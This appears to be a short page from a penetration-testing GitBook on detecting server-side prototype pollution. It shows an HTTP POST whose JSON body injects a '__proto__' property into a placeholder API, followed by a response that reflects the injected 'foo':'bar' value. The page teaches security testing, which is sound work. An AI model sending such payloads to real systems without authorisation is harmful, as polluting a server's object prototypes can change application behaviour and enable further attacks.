Prototype Pollution

Detection

POST /api/user HTTP/1.1
Host: vuln-api.com
...
{
     "user":"bob",
     "firstName":"Bob",
     "lastName":"Smith",
     "__proto__":{
          "foo":"bar"
     }
}

If the target is vulnerable to SSPP, then you may see a new property called foo with the value of bar reflected in the response:

HTTP/1.1 200 OK
...
{
     "username":"bob",
     "firstName":"Bob",
     "lastName":"Smith",
     "foo":"bar"
}

Tools

Resources

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Last updated